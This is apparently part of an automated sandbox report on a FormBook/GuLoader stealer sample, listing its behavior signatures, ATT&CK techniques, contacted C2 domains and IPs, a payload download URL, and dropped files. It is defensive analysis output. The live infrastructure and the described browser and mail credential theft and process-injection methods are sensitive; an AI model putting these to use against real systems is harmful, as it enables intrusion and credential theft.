            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Shared Modules
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            LSASS Memory115
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell
            Logon Script (Windows)1
            Access Token Manipulation
            3
            Obfuscated Files or Information
            Security Account Manager221
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook612
            Process Injection
            1
            Software Packing
            NTDS2
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572359 Sample: Forhandlingsfriheden.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 40 www.dy01urj.pro 2->40 42 carhireheaven.online 2->42 44 www.carhireheaven.online 2->44 60 Suricata IDS alerts for network traffic 2->60 62 Antivirus detection for URL or domain 2->62 64 Yara detected FormBook 2->64 66 4 other signatures 2->66 11 Forhandlingsfriheden.exe 23 2->11         started        signatures3 process4 file5 34 C:\Users\user\AppData\...\bambusmbler.gud, Unicode 11->34 dropped 78 Suspicious powershell command line found 11->78 15 powershell.exe 30 11->15         started        signatures6 process7 file8 36 C:\Users\user\AppData\...\Opfattelsers.exe, PE32 15->36 dropped 38 C:\Users\...\Opfattelsers.exe:Zone.Identifier, ASCII 15->38 dropped 52 Early bird code injection technique detected 15->52 54 Writes to foreign memory regions 15->54 56 Sample uses process hollowing technique 15->56 58 4 other signatures 15->58 19 Opfattelsers.exe 6 15->19         started        23 conhost.exe 15->23         started        signatures9 process10 dnsIp11 46 212.162.149.66, 49850, 80 UNREAL-SERVERSUS Netherlands 19->46 68 Multi AV Scanner detection for dropped file 19->68 70 Machine Learning detection for dropped file 19->70 72 Maps a DLL or memory area into another process 19->72 74 Switches to a custom stack to bypass stack traces 19->74 25 PxuyeSuijNdsM.exe 19->25 injected signatures12 process13 dnsIp14 48 carhireheaven.online 165.22.38.185, 49915, 80 DIGITALOCEAN-ASNUS United States 25->48 50 www.dy01urj.pro 154.88.22.104, 49954, 49961, 80 CNSERVERSUS Seychelles 25->50 76 Found direct / indirect Syscall (likely to bypass EDR) 25->76 29 svchost.exe 13 25->29         started        signatures15 process16 signatures17 80 Tries to steal Mail credentials (via file / registry access) 29->80 82 Tries to harvest and steal browser information (history, passwords, etc) 29->82 84 Modifies the context of a thread in another process (thread injection) 29->84 86 2 other signatures 29->86 32 firefox.exe 29->32         started        process18

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Forhandlingsfriheden.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Opfattelsers.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Opfattelsers.exe18%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe
            https://ion=v4.5sPu70%Avira URL Cloudsafe
            http://212.162.149.66/KtFSlX90.bin&0%Avira URL Cloudsafe
            http://212.162.149.66/KtFSlX90.binsd0%Avira URL Cloudsafe
            http://212.162.149.66/0%Avira URL Cloudsafe
            http://212.162.149.66/KtFSlX90.bin%0%Avira URL Cloudsafe
            http://www.carhireheaven.online/rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE60%Avira URL Cloudsafe
            http://212.162.149.66/KtFSlX90.bin100%Avira URL Cloudmalware
            http://www.dy01urj.pro0%Avira URL Cloudsafe
            http://www.dy01urj.pro/f425/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            carhireheaven.online
            165.22.38.185
            truetrue
              unknown
              www.dy01urj.pro
              154.88.22.104
              truetrue
                unknown
                www.carhireheaven.online
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://www.dy01urj.pro/f425/true
                  • Avira URL Cloud: safe
                  unknown
                  http://www.carhireheaven.online/rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE6true
                  • Avira URL Cloud: safe
                  unknown
                  http://212.162.149.66/KtFSlX90.binfalse
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabsvchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.ftp.ftp://ftp.gopher.Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://nsis.sf.net/NSIS_ErrorErrorForhandlingsfriheden.exe, Opfattelsers.exe.2.drfalse
                                            high
                                            https://www.ecosia.org/newtab/svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ion=v4.5sPu7powershell.exe, 00000002.00000002.2799477621.0000000006E0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.mpowershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdOpfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                  high
                                                                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdOpfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                    high
                                                                    http://212.162.149.66/KtFSlX90.bin&Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://212.162.149.66/KtFSlX90.bin%Opfattelsers.exe, 00000006.00000002.3039764364.0000000003B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.dy01urj.proPxuyeSuijNdsM.exe, 00000008.00000002.3367185482.0000000008CCA000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://212.162.149.66/KtFSlX90.binsdOpfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://212.162.149.66/Opfattelsers.exe, 00000006.00000003.2935042588.0000000003B3A000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3039878471.0000000003B3C000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935165232.0000000003B3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        165.22.38.185
                                                                        carhireheaven.onlineUnited States
                                                                        14061DIGITALOCEAN-ASNUStrue
                                                                        154.88.22.104
                                                                        www.dy01urj.proSeychelles
                                                                        40065CNSERVERSUStrue
                                                                        212.162.149.66
                                                                        unknownNetherlands
                                                                        64236UNREAL-SERVERSUSfalse
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1572359
                                                                        Start date and time:2024-12-10 13:51:04 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 56s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:11
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Forhandlingsfriheden.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@10/14@2/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 80%
                                                                        HCA Information:
                                                                        • Successful, ratio: 86%
                                                                        • Number of executed functions: 133
                                                                        • Number of non-executed functions: 314
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5336 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Forhandlingsfriheden.exe
                                                                        TimeTypeDescription
                                                                        07:51:54API Interceptor37x Sleep call for process: powershell.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        165.22.38.185Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          154.88.22.104Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                          • www.dy01urj.pro/82h3/
                                                                          Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.dy01urj.pro/f425/
                                                                          212.162.149.66purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.66/NmxYyszZoKwuD57.bin
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.dy01urj.proNeed Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                          • 154.88.22.104
                                                                          Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 154.88.22.104
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CNSERVERSUSrebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 43.243.183.82
                                                                          Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                          • 154.88.22.104
                                                                          DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                          • 154.90.58.209
                                                                          Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                          • 172.247.112.164
                                                                          jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                          • 23.225.125.46
                                                                          SRT68.exeGet hashmaliciousFormBookBrowse
                                                                          • 154.88.22.105
                                                                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.225.159.42
                                                                          ex86.elfGet hashmaliciousMiraiBrowse
                                                                          • 156.251.245.99
                                                                          PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                          • 154.88.22.101
                                                                          Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                          • 154.88.22.101
                                                                          DIGITALOCEAN-ASNUShttp://email.edms.trackingmore.com/c/eJx0zrFuhDAMgOGnCWPE2YHAkKELr4FsxwF05EBJWun69JU6den8D_8XQz88mKXT8PCICDi6udsDJB44oUuePHiZGCABe0UvMAlP3RGGSSHOI4w--d7NiUdBAlQPKglkNq7Pb9sKyfN4bfkqauXK3Rn21m6DHwYWA0usZKlGu50X03lT2-tOJ1mNn_Z1G1hK7PJ7zVorbboe8Y9z_T7kWS7W0tD1xvVbpuP8vZTwf_sK8BMAAP__3p9Nvw#4UjjVf19156dXgi477henjyiztuh1607QELNKWKBNFUHFFI32RLCJ32096s9/84502vqzGet hashmaliciousPhisherBrowse
                                                                          • 159.65.226.43
                                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                          • 188.166.27.224
                                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                          • 138.68.122.102
                                                                          lz3EbiqoK4.exeGet hashmaliciousQuasarBrowse
                                                                          • 167.71.56.116
                                                                          lz3EbiqoK4.exeGet hashmaliciousQuasarBrowse
                                                                          • 167.71.56.116
                                                                          deeffrot.docGet hashmaliciousUnknownBrowse
                                                                          • 165.227.215.208
                                                                          https://sendgb.com/vdRYC6Nal34?utm_medium=HlyZfLISdD8Bj1iGet hashmaliciousUnknownBrowse
                                                                          • 185.14.184.154
                                                                          xxx.docGet hashmaliciousUnknownBrowse
                                                                          • 165.227.215.208
                                                                          Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                          • 165.227.215.208
                                                                          RUCkZvoDjG.htmGet hashmaliciousWinSearchAbuseBrowse
                                                                          • 68.183.112.81
                                                                          UNREAL-SERVERSUSPO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.89
                                                                          la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 162.251.123.175
                                                                          file.exeGet hashmaliciousRedLineBrowse
                                                                          • 212.162.149.48
                                                                          https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                                                          • 172.96.10.214
                                                                          scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 162.251.122.87
                                                                          1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 212.162.149.63
                                                                          purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 212.162.149.66
                                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                                          • 212.162.149.128
                                                                          Juleferien.exeGet hashmaliciousFormBookBrowse
                                                                          • 212.162.149.128
                                                                          RFQ-24-10104-PO X241104754-007.exeGet hashmaliciousRemcosBrowse
                                                                          • 162.251.122.86
                                                                          No context
                                                                          No context
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):53158
                                                                          Entropy (8bit):5.062687652912555
                                                                          Encrypted:false
                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.1239949490932863
                                                                          Encrypted:false
                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\Forhandlingsfriheden.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):340924
                                                                          Entropy (8bit):1.2553271369192232
                                                                          Encrypted:false
                                                                          SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                                                          MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                                                          SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                                                          SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                                                          SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                                                          Malicious:false
